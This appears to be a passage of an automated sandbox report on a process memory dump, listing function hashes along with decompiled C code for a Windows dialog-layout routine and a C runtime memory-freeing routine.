Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 39b2890504f8905d79c0cfab1cdc659252ece61ef23225fbf193947c6026ee2e
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: A3C1DD7722A0574ADF9D8A3A857403EBBA16E617B131A476ED8B7CB0D4FE20C538D710

Uniqueness

Uniqueness Score: -1.00%

Function 00280548, Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: e23b7aba913534a22e472ba61a70f7daaecd447c78965e9893b9059781d28b3f
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: BFC1FC7711A0574ADFAD8A3AC57403EFBA15EA17B131A476ED8B2CB0C5FE20C538D610

Uniqueness

Uniqueness Score: -1.00%

Function 0027FCDE, Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 9503796439a01977acd2c96f456e3d3c8a779098100d5f600ac2918113d5c8ec
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 35C1CA7311D0574ADFAE8A3AC67413EBAA15A627B131A477ED8B6CB0D4FE30C534D610

Uniqueness

Uniqueness Score: -1.00%

Function 0027F8C6, Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 6cb9883040cec613cb4b21c0f1f1676203a40568d44edd4a485108f2c6036df9
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: B7C1B87321D1574ADF9E8A3AC63013EBAA15AA17B131A977ED8BACB1C4FE30C534D510

Uniqueness

Uniqueness Score: -1.00%

Function 0026DF12, Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f06382a47cc16b5566162d5512e178d4c0756bb98d6315f89048cf254d309adc
Instruction ID: 4e25f34eaf0bf168f86f458fe32cd0c41147c3f21082ef544441b8d18bf738bd
Opcode Fuzzy Hash: f06382a47cc16b5566162d5512e178d4c0756bb98d6315f89048cf254d309adc
Instruction Fuzzy Hash: 69E123755183908FC704CF29E89086BBBF0ABCA301F89499EF9D587352C735E915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0027364E, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
Instruction ID: 6a44b55aeb529c56996cb2f0d82c5e73f49e45cd779952eb25606ce58b4a2af6
Opcode Fuzzy Hash: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
Instruction Fuzzy Hash: EF916EB022434687DB24EF68CC95BBE73C5BB50304F10892DF59F97282DBB49664DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00283EE9, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa19261eef3ed325f8fa7eae44602d054e6e4d7cb1627bd8b56098f3d1510a4
Instruction ID: 2910f13a47f5fa8aaf9b0897034e0e50890f8aba152f4001a1b869d395ff6ac1
Opcode Fuzzy Hash: daa19261eef3ed325f8fa7eae44602d054e6e4d7cb1627bd8b56098f3d1510a4
Instruction Fuzzy Hash: 2861987DA3270B63DE38FD2888557BF63A4AB21F04F14451AE746DB9C2D2419F728781

Uniqueness

Uniqueness Score: -1.00%

Function 0027397F, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
Instruction ID: b844337c4d408ae2e3c1ced4fc218a29238b704af1541e621f8bf905c7d421c5
Opcode Fuzzy Hash: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
Instruction Fuzzy Hash: 727162713243468BDB34DE28C8D1B7D77D4EB90308F00C92DE9CE8B282DA749A95DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00283CBA, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 683de4b6eca3d2dff94acec26168e04a247355b336091f419ea26d36afb23474
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: 5851452C633A4757DB38FD2884A67BE67C99F12F04F180919E882CB6C2C655DF718352

Uniqueness

Uniqueness Score: -1.00%

Function 0026DADD, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d398ab499bae2272120c13040a8d5eef374c100a5c1ea5cef9f4d86edfc06e7
Instruction ID: d826829108d16af09bbd25eca337aac13a47a07e96ae29c98a7e001ff7c23f7a
Opcode Fuzzy Hash: 5d398ab499bae2272120c13040a8d5eef374c100a5c1ea5cef9f4d86edfc06e7
Instruction Fuzzy Hash: 0A81B4826291E49FC7065F3D38A82F63FA14773341B1D44FAC4D6C72A7C9B685A8C722

Uniqueness

Uniqueness Score: -1.00%

Function 0026F5C5, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c83fb7356bb10715104aa85ac527b4525b2e71a6ab5d3e7119df01fd78646e0
Instruction ID: 5f504ae385112b5d8fd0bd9dc2c4b660c9470c4d8446aecc61b9115ef52edbd8
Opcode Fuzzy Hash: 3c83fb7356bb10715104aa85ac527b4525b2e71a6ab5d3e7119df01fd78646e0
Instruction Fuzzy Hash: BB5126B1A083128FC748CF19D49059AF7E1FF88314F054A2EE899A7740DB34E959CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 002733D3, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
Instruction ID: b963639397c7423170f42cc6c67504c606729811a61536ac50bf33768b69e258
Opcode Fuzzy Hash: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
Instruction Fuzzy Hash: 7331E5716247168FCB18DF28C86126ABBD0FB95300F00852DE8C9D7741C775EA59CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00265D7E, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97bdacecfe748e71fdb036bd2a134ee05792d0ab0461abb020b1b2891cb64e12
Instruction ID: b71b6105c748d1a54c36a735954c6b1fa905c5348da1ad145c7b0ef66c083ad4
Opcode Fuzzy Hash: 97bdacecfe748e71fdb036bd2a134ee05792d0ab0461abb020b1b2891cb64e12
Instruction Fuzzy Hash: 5521C571A304318BCF48CF2DED9447A7351AB8A30174A812BEA4ADF2D1D539E974C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0026D70B, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 235
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0026D70B(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				signed int _t104;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				signed int _t185;
				struct HWND__* _t186;
				struct HWND__* _t187;
				void* _t188;
				void* _t191;
				signed int _t192;
				long _t193;
				void* _t200;
				int* _t201;
				struct HWND__* _t202;
				void* _t204;
				void* _t205;
				void* _t207;
				void* _t209;
				void* _t213;

				_t202 = __ecx;
				_v2368.bottom = __ecx;
				E00263E41( &_v2208, 0x50, L"$%s:", _a8);
				_t207 =  &_v2368 + 0x10;
				E002711FA( &_v2208,  &_v2288, 0x50);
				_t96 = E00282BB0( &_v2300);
				_t186 = _v8;
				_t155 = 0;
				_v2376 = _t96;
				_t209 =  *0x29d5f4 - _t155; // 0x63
				if(_t209 <= 0) {
					L8:
					_t156 = E0026CD7D(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t186,  &_v2352);
					GetClientRect(_t186,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t104 = _v2320.bottom;
					_t191 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t204 = _t191 - _v2304;
					_v2368.bottom = _t169 - _t104;
					if(_t156 == 0) {
						L15:
						_t221 = _a12;
						if(_a12 == 0 && E0026CE00(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t186,  &_v2048);
						}
						L18:
						_t205 = _t204 - GetSystemMetrics(8);
						_t106 = GetWindow(_t186, 5);
						_t187 = _t106;
						_v2368.bottom = _t187;
						if(_t156 == 0) {
							L24:
							return _t106;
						}
						_t157 = 0;
						while(_t187 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t187,  &_v2320);
							_t170 = _v2320.top.left;
							_t192 = 0x64;
							asm("cdq");
							_t193 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0x29dfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
							_t106 = GetWindow(_t187, 2);
							_t187 = _t106;
							__eflags = _t187 - _v2384;
							if(_t187 == _v2384) {
								goto L24;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t158 = 0x64;
					asm("cdq");
					_t134 = _v2292 * _v2368.top;
					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
					_v2324 = _t160;
					asm("cdq");
					_t185 = _t134 % _v2352.top;
					_v2352.left = _t134 / _v2352.top + _t204;
					asm("cdq");
					asm("cdq");
					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
					if(_t163 < 0) {
						_t163 = 0;
					}
					if(_t200 < 0) {
						_t200 = 0;
					}
					 *0x29dfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t186,  &_v2368);
					_t156 = _v2393;
					goto L15;
				} else {
					_t201 = 0x29d154;
					do {
						if( *_t201 > 0) {
							_t9 =  &(_t201[1]); // 0x2933e0
							_t150 = E00285460( &_v2288,  *_t9, _t96);
							_t207 = _t207 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t201[1]); // 0x2933e0
								if(E0026CF57(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t201 =  &(_t201[3]);
						_t213 = _t155 -  *0x29d5f4; // 0x63
					} while (_t213 < 0);
					goto L8;
				}
			}

0x0026d723
0x0026d72d
0x0026d731
0x0026d736
0x0026d748
0x0026d752
0x0026d757
0x0026d75e
0x0026d761
0x0026d765
0x0026d76b
0x0026d7c8
0x0026d7e0
0x0026d7e8
0x0026d7ec
0x0026d7f8
0x0026d80a
0x0026d811
0x0026d815
0x0026d818
0x0026d820
0x0026d826
0x0026d82c
0x0026d8cd
0x0026d8cd
0x0026d8d5
0x0026d906
0x0026d906
0x0026d90c
0x0026d917
0x0026d919
0x0026d91f
0x0026d921
0x0026d927
0x0026d9d9
0x0026d9d9
0x0026d9d9
0x0026d92d
0x0026d9c7
0x0026d934
0x0026d93a
0x00000000
0x00000000
0x0026d946
0x0026d950
0x0026d965
0x0026d96a
0x0026d96d
0x0026d983
0x0026d98b
0x0026d98d
0x0026d98e
0x0026d996
0x0026d9a8
0x0026d9af
0x0026d9b8
0x0026d9be
0x0026d9c0
0x0026d9c4
0x00000000
0x00000000
0x0026d9c6
0x0026d9c6
0x0026d9c6
0x00000000
0x0026d9c7
0x0026d83a
0x00000000
0x00000000
0x0026d847
0x0026d848
0x0026d851
0x0026d856
0x0026d85c
0x0026d860
0x0026d861
0x0026d867
0x0026d871
0x0026d878
0x0026d881
0x0026d885
0x0026d889
0x0026d88b
0x0026d88b
0x0026d88f
0x0026d891
0x0026d891
0x0026d8b7
0x0026d8c3
0x0026d8c9
0x00000000
0x0026d76d
0x0026d76d
0x0026d772
0x0026d775
0x0026d778
0x0026d780
0x0026d785
0x0026d78a
0x0026d79b
0x0026d7a5
0x0026d7b2
0x0026d7b2
0x0026d7a5
0x0026d7b8
0x0026d7b8
0x0026d7bc
0x0026d7bd
0x0026d7c0
0x0026d7c0
0x00000000
0x0026d772

APIs

_swprintf.LIBCMT ref: 0026D731

Part of subcall function 00263E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00263E54

Part of subcall function 002711FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,002A0078,?,0026CE91,00000000,?,00000050,002A0078), ref: 00271217

_strlen.LIBCMT ref: 0026D752
SetDlgItemTextW.USER32(?,0029D154,?), ref: 0026D7B2
GetWindowRect.USER32(?,?), ref: 0026D7EC
GetClientRect.USER32(?,?), ref: 0026D7F8
GetWindowLongW.USER32(?,000000F0), ref: 0026D896
GetWindowRect.USER32(?,?), ref: 0026D8C3
SetWindowTextW.USER32(?,?), ref: 0026D906
GetSystemMetrics.USER32(00000008), ref: 0026D90E
GetWindow.USER32(?,00000005), ref: 0026D919
GetWindowRect.USER32(00000000,?), ref: 0026D946
GetWindow.USER32(00000000,00000002), ref: 0026D9B8

Strings

CAPTION, xrefs: 0026D8E8
$%s:, xrefs: 0026D725
d, xrefs: 0026D818

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: a296d707ec2da476fa005536e0f09b681b69a96570297165f57f6b91b680a170
Instruction ID: c967f532777b98d3719b489a991fc264e396724f958367a9d0387839af427de3
Opcode Fuzzy Hash: a296d707ec2da476fa005536e0f09b681b69a96570297165f57f6b91b680a170
Instruction Fuzzy Hash: 0881B072609345AFD710DF68DD89B6FBBE8EB88704F04092DFA8593290D630E859CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0028B784, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0028B784(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x29dd50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00287A50(_t46);
							E0028B363( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00287A50(_t47);
							E0028B461( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00287A50( *((intOrPtr*)(_t74 + 0x7c)));
						E00287A50( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00287A50( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00287A50( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00287A50( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00287A50( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0028B8F7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x29d818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00287A50(_t31);
							E00287A50( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00287A50(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00287A50(_t74);
			}

0x0028b78c
0x0028b790
0x0028b798
0x0028b7a1
0x0028b7a6
0x0028b7ad
0x0028b7b5
0x0028b7bd
0x0028b7c8
0x0028b7ce
0x0028b7cf
0x0028b7d7
0x0028b7df
0x0028b7ea
0x0028b7f0
0x0028b7f4
0x0028b7ff
0x0028b805
0x0028b7a6
0x0028b806
0x0028b80e
0x0028b821
0x0028b834
0x0028b842
0x0028b84d
0x0028b852
0x0028b85b
0x0028b863
0x0028b864
0x0028b86a
0x0028b86d
0x0028b870
0x0028b877
0x0028b879
0x0028b87d
0x0028b885
0x0028b88c
0x0028b892
0x0028b893
0x0028b893
0x0028b89a
0x0028b89c
0x0028b8a1
0x0028b8a9
0x0028b8ae
0x0028b8af
0x0028b8af
0x0028b8b2
0x0028b8b5
0x0028b8b8
0x0028b8bb
0x0028b8bb
0x0028b8cd

APIs

___free_lconv_mon.LIBCMT ref: 0028B7C8

Part of subcall function 0028B363: _free.LIBCMT ref: 0028B380
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B392
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B3A4
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B3B6
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B3C8
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B3DA
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B3EC
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B3FE
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B410
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B422
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B434
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B446
Part of subcall function 0028B363: _free.LIBCMT ref: 0028B458

_free.LIBCMT ref: 0028B7BD

Part of subcall function 00287A50: HeapFree.KERNEL32(00000000,00000000), ref: 00287A66
Part of subcall function 00287A50: GetLastError.KERNEL32(?,?,0028B4F8,?,00000000,?,00000000,?,0028B51F,?,00000007,?,?,0028B91C,?,?), ref: 00287A78

_free.LIBCMT ref: 0028B7DF
_free.LIBCMT ref: 0028B7F4
_free.LIBCMT ref: 0028B7FF
_free.LIBCMT ref: 0028B821
_free.LIBCMT ref: 0028B834
_free.LIBCMT ref: 0028B842
_free.LIBCMT ref: 0028B84D
_free.LIBCMT ref: 0028B885
_free.LIBCMT ref: 0028B88C
_free.LIBCMT ref: 0028B8A9
_free.LIBCMT ref: 0028B8C1

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
